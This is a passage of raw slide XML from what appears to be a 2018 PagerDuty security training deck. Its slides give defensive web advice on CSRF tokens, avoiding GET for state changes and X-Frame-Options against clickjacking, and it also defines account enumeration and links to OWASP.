          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>public</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1843" name="SECURITY TRAINING, 2018"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="24"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>SECURITY TRAINING, 2018</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1844" name="Use CSRF tokens for all state changing operations."/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Use CSRF tokens for all state changing operations.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1845" name="KEY TAKEAWAY"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="20250661" y="358292"/>
            <a:ext cx="3717418" cy="735952"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 13906"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="25C15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KEY TAKEAWAY</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9" name="Never use GET for state changing actions."/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="9000"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Never use GET for state changing actions.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1850" name="PagerDuty_logo_WHITE.png" descr="PagerDuty_logo_WHITE.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85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852" name="public"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="23"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>public</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1853" name="SECURITY TRAINING, 2018"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="24"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>SECURITY TRAINING, 2018</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1854" name="KEY TAKEAWAY"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="20250661" y="358292"/>
            <a:ext cx="3717418" cy="735952"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 13906"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="25C15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KEY TAKEAWAY</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" spd="fast"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8"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85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860" name="public"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="23"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>public</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1861" name="SECURITY TRAINING, 2018"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="24"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>SECURITY TRAINING, 2018</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1862" name="Image" descr="Image"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4021207" y="211696"/>
            <a:ext cx="13292608" cy="13292608"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1863" name="Clickjacking. Get it?"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="17792675" y="8672574"/>
            <a:ext cx="2385889" cy="447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000">
                <a:solidFill>
                  <a:srgbClr val="A6AAA9"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Clickjacking. Get it?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1864" name="mouse-pointers.png" descr="mouse-pointers.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5">
            <a:extLst/>
          </a:blip>
          <a:srcRect l="5423" t="14477" r="53860" b="12408"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="11230354" y="1612341"/>
            <a:ext cx="4547316" cy="6131049"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>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8" name="PagerDuty_logo_GREEN.png" descr="PagerDuty_logo_GREEN.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86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870" name="public"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="23"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>public</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1871" name="SECURITY TRAINING, 2018"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="24"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>SECURITY TRAINING, 2018</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1872" name="https://www.tinfoilsecurity.com/blog/tags/clickjacking"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="25"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr>
                <a:hlinkClick r:id="rId4" invalidUrl="" action="" tgtFrame="" tooltip="" history="1" highlightClick="0" endSnd="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr u="none"/>
            </a:pPr>
            <a:r>
              <a:rPr u="sng">
                <a:hlinkClick r:id="rId4" invalidUrl="" action="" tgtFrame="" tooltip="" history="1" highlightClick="0" endSnd="0"/>
              </a:rPr>
              <a:t>https://www.tinfoilsecurity.com/blog/tags/clickjacking</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1873" name="Image" descr="Image"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph type="pic" idx="26"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5">
            <a:extLst/>
          </a:blip>
          <a:srcRect l="0" t="0" r="0" b="0"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1874" name="Image" descr="Image"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3091650" y="1046426"/>
            <a:ext cx="18437767" cy="12224214"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>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78"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87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880" name="public"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="23"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>public</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1881" name="SECURITY TRAINING, 2018"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="24"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>SECURITY TRAINING, 2018</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1882" name="Rectangle"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-68990" y="3218879"/>
            <a:ext cx="24504121" cy="1881767"/>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1883" name="X-Frame-Options: SAMEORIGIN"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7297675" y="3694624"/>
            <a:ext cx="9806509"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rgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>X-Frame-Options: SAMEORIGIN</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1884" name="“The page can only be displayed in a frame on the same origin as the page itself.”"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3863293" y="4647977"/>
            <a:ext cx="16675274" cy="1450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a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr i="1" sz="3600">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>“The page can only be displayed in a frame on the same origin as the page itself.”</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1885" name="Rectangle"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-137649" y="7683723"/>
            <a:ext cx="24504120" cy="1881767"/>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1886" name="X-Frame-Options: DENY"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8472276" y="8159468"/>
            <a:ext cx="7421588"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rgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>X-Frame-Options: DENY</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1887" name="“The page cannot be displayed in a frame, regardless of the site attempting to do so.”"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3489697" y="9150921"/>
            <a:ext cx="17386747" cy="1450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a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr i="1" sz="3600">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>“The page cannot be displayed in a frame, regardless of the site attempting to do so.”</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1888" name="HTTP HEADER"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="20225611" y="37186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HTTP HEADER</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1889" name="HTTP HEADER"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="20225611" y="82017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HTTP HEADER</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3"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334" name="SECURITY TRAINING, 2018"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="24"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>SECURITY TRAINING, 2018</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="335" name="[ REDACTED ]"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7411888" y="5935662"/>
            <a:ext cx="9560224" cy="184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solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>[ REDACTED ]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" spd="fast"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93"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894"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895" name="public"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="23"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>public</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1896" name="SECURITY TRAINING, 2018"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="24"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>SECURITY TRAINING, 2018</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1897" name="Set X-Frame-Options to SAMEORIGIN or DENY for every logged in page."/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr defTabSz="420623">
              <a:defRPr sz="10304"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Set X-Frame-Options to SAMEORIGIN or DENY for every logged in page.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1898" name="KEY TAKEAWAY"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="20250661" y="358292"/>
            <a:ext cx="3717418" cy="735952"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 13906"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="25C15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KEY TAKEAWAY</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2" name="Additional Reading"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>          Additional Reading</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1903" name="https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="996553" y="4389304"/>
            <a:ext cx="22390894" cy="7469321"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:rPr u="sng">
                <a:hlinkClick r:id="rId3" invalidUrl="" action="" tgtFrame="" tooltip="" history="1" highlightClick="0" endSnd="0"/>
              </a:rPr>
              <a:t>https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:rPr u="sng">
                <a:hlinkClick r:id="rId4" invalidUrl="" action="" tgtFrame="" tooltip="" history="1" highlightClick="0" endSnd="0"/>
              </a:rPr>
              <a:t>https://en.wikipedia.org/wiki/Cross-site_request_forgery</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1904" name="Image" descr="Image"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph type="pic" idx="21"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5">
            <a:extLst/>
          </a:blip>
          <a:srcRect l="0" t="0" r="0" b="0"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="743302" y="12987118"/>
            <a:ext cx="1691863" cy="324838"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1905"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906" name="PUBLIC"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="23"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>PUBLIC</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1907" name="SECURITY TRAINING, 2018"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="24"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>SECURITY TRAINING, 2018</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1908" name="book (1).png" descr="book (1).png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="711200" y="946811"/>
            <a:ext cx="3036094" cy="3036095"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" spd="fast"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2" name="PagerDuty_logo_GREEN.png" descr="PagerDuty_logo_GREEN.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91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914" name="public"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="23"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>public</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1915" name="SECURITY TRAINING, 2018"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="24"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>SECURITY TRAINING, 2018</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1916" name="Account Enumeration"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="869950" y="4536281"/>
            <a:ext cx="22644099" cy="464343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gn="l">
              <a:defRPr sz="11200">
                <a:solidFill>
                  <a:srgbClr val="353535"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Account Enumeration</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1917" name="Image" descr="Image"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="13171423" y="3847535"/>
            <a:ext cx="10912823" cy="9818592"/>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1" name="Image" descr="Image"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix amt="20000"/>
            <a:extLst/>
          </a:blip>
          <a:srcRect l="0" t="15761" r="0" b="0"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-376436" y="-5154944"/>
            <a:ext cx="25136674" cy="26464288"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1922" name="Extracting a list of users, accounts,  or customers from a website."/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Extracting a list of users, accounts,  or customers from a website.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1923"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1924"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925" name="public"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="23"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
